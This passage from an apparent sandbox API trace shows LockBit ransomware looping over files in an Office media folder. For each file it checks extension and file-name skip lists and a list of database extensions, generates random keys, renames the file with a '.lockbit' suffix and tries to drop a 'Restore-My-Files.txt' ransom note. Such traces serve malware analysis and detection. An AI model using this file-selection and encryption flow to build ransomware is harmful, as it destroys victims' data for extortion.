Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18238_.WMF.lockbit") returned 79 [0201.282] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18238_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18238_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0201.283] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0201.283] malloc (_Size=0x40068) returned 0x3df0008 [0201.283] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=1588) returned 1 [0201.283] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0201.284] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0201.284] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0201.284] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0201.285] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0201.285] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0201.285] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0201.293] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18238_.WMF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18238_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0201.293] malloc (_Size=0xb4) returned 0x1fa2ed8 [0201.293] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb4, FileInformationClass=0xa) returned 0xc0000008 [0201.294] free (_Block=0x1fa2ed8) [0201.294] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18238_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP") returned 1 [0201.294] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt") returned 79 [0201.294] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0201.294] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd9086900, ftCreationTime.dwHighDateTime=0x1bddcaa, ftLastAccessTime.dwLowDateTime=0xbcc98140, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xd9086900, ftLastWriteTime.dwHighDateTime=0x1bddcaa, nFileSizeHigh=0x0, nFileSizeLow=0x93c4, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD18239_.WMF", cAlternateFileName="")) returned 1 [0201.294] lstrcmpiW (lpString1=".", lpString2="BD18239_.WMF") returned -1 [0201.294] lstrcmpiW (lpString1="..", lpString2="BD18239_.WMF") returned -1 [0201.294] PathFindExtensionW (pszPath="BD18239_.WMF") returned=".WMF" [0201.294] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0201.294] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0201.294] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0201.294] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0201.294] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0201.294] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0201.294] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0201.294] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0201.294] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0201.294] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0201.294] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0201.294] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0201.294] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0201.294] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0201.294] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0201.295] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0201.295] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0201.295] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0201.295] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0201.295] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0201.295] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0201.295] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0201.295] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0201.295] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0201.295] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0201.295] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0201.295] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0201.295] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0201.295] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0201.295] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0201.295] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0201.295] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0201.295] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0201.295] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0201.295] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0201.295] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0201.295] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0201.295] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0201.295] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0201.295] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0201.295] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0201.295] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0201.296] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0201.296] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0201.296] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0201.296] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0201.296] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0201.296] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD18239_.WMF") returned 1 [0201.296] lstrcmpiW (lpString1="ntldr", lpString2="BD18239_.WMF") returned 1 [0201.296] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD18239_.WMF") returned 1 [0201.296] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD18239_.WMF") returned 1 [0201.296] lstrcmpiW (lpString1="autorun.inf", lpString2="BD18239_.WMF") returned -1 [0201.296] lstrcmpiW (lpString1="thumbs.db", lpString2="BD18239_.WMF") returned 1 [0201.296] lstrcmpiW (lpString1="iconcache.db", lpString2="BD18239_.WMF") returned 1 [0201.296] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\") returned="" [0201.296] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18239_.WMF") returned=".WMF" [0201.296] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0201.296] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0201.296] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0201.296] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0201.296] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0201.296] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0201.296] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0201.296] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0201.296] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0201.296] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0201.296] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0201.296] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0201.296] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0201.297] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0201.297] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0201.297] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0201.297] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0201.297] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0201.297] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0201.297] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0201.297] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0201.297] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0201.297] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0201.297] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0201.297] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0201.297] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0201.297] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0201.297] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0201.297] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18239_.WMF.lockbit") returned 79 [0201.297] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18239_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18239_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0201.299] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0201.299] malloc (_Size=0x40068) returned 0x3df0008 [0201.299] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=37828) returned 1 [0201.299] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0201.299] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0201.299] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0201.299] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0201.300] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0201.300] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0201.300] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0201.788] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18239_.WMF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18239_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0201.788] malloc (_Size=0xb4) returned 0x1fa2ed8 [0201.788] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb4, FileInformationClass=0xa) returned 0x0 [0201.825] free (_Block=0x1fa2ed8) [0201.825] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18239_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP") returned 1 [0201.825] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt") returned 79 [0201.826] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0201.826] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa2305400, ftCreationTime.dwHighDateTime=0x1bddca6, ftLastAccessTime.dwLowDateTime=0xbcc98140, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa2305400, ftLastWriteTime.dwHighDateTime=0x1bddca6, nFileSizeHigh=0x0, nFileSizeLow=0xac8, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD18241_.WMF", cAlternateFileName="")) returned 1 [0201.826] lstrcmpiW (lpString1=".", lpString2="BD18241_.WMF") returned -1 [0201.826] lstrcmpiW (lpString1="..", lpString2="BD18241_.WMF") returned -1 [0201.826] PathFindExtensionW (pszPath="BD18241_.WMF") returned=".WMF" [0201.826] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0201.826] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0201.826] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0201.826] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0201.826] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0201.826] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0201.826] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0201.826] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0201.826] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0201.826] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0201.826] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0201.826] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0201.826] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0201.826] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0201.826] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0201.826] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0201.826] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0201.826] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0201.826] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0201.826] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0201.827] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0201.827] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0201.827] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0201.827] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0201.827] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0201.827] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0201.827] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0201.827] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0201.827] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0201.827] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0201.827] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0201.827] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0201.827] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0201.827] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0201.827] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0201.827] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0201.827] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0201.827] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0201.827] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0201.827] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0201.827] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0201.827] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0201.827] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0201.827] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0201.827] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0201.827] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0201.827] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0201.827] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD18241_.WMF") returned 1 [0201.827] lstrcmpiW (lpString1="ntldr", lpString2="BD18241_.WMF") returned 1 [0201.827] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD18241_.WMF") returned 1 [0201.827] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD18241_.WMF") returned 1 [0201.827] lstrcmpiW (lpString1="autorun.inf", lpString2="BD18241_.WMF") returned -1 [0201.828] lstrcmpiW (lpString1="thumbs.db", lpString2="BD18241_.WMF") returned 1 [0201.828] lstrcmpiW (lpString1="iconcache.db", lpString2="BD18241_.WMF") returned 1 [0201.828] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\") returned="" [0201.828] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18241_.WMF") returned=".WMF" [0201.828] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0201.828] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0201.828] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0201.828] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0201.828] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0201.828] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0201.828] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0201.828] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0201.828] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0201.828] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0201.828] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0201.828] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0201.828] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0201.828] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0201.828] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0201.828] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0201.828] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0201.828] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0201.828] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0201.828] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0201.828] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0201.828] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0201.830] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0201.830] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0201.830] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0201.830] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0201.830] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0201.830] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0201.830] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18241_.WMF.lockbit") returned 79 [0201.830] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18241_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18241_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0201.835] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0201.835] malloc (_Size=0x40068) returned 0x3df0008 [0201.835] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=2760) returned 1 [0201.835] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0201.836] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0201.836] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0201.836] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0201.836] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0201.836] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0201.836] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0201.906] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18241_.WMF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18241_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0201.906] malloc (_Size=0xb4) returned 0x1fa2ed8 [0201.906] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb4, FileInformationClass=0xa) returned 0xc0000008 [0201.906] free (_Block=0x1fa2ed8) [0201.906] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18241_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP") returned 1 [0201.906] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt") returned 79 [0201.906] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0201.906] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a42b600, ftCreationTime.dwHighDateTime=0x1bdcf1d, ftLastAccessTime.dwLowDateTime=0xbcc98140, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x6a42b600, ftLastWriteTime.dwHighDateTime=0x1bdcf1d, nFileSizeHigh=0x0, nFileSizeLow=0x822, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD18242_.WMF", cAlternateFileName="")) returned 1 [0201.906] lstrcmpiW (lpString1=".", lpString2="BD18242_.WMF") returned -1 [0201.906] lstrcmpiW (lpString1="..", lpString2="BD18242_.WMF") returned -1 [0201.906] PathFindExtensionW (pszPath="BD18242_.WMF") returned=".WMF" [0201.906] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0201.906] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0201.906] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0201.906] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0201.906] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0201.907] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0201.907] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0201.907] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0201.907] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0201.907] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0201.907] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0201.907] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0201.907] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0201.907] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0201.907] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0201.907] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0201.907] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0201.907] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0201.907] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0201.907] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0201.907] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0201.907] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0201.907] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0201.907] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0201.907] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0201.907] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0201.907] lstrcmpiW (lpString1=".drv", 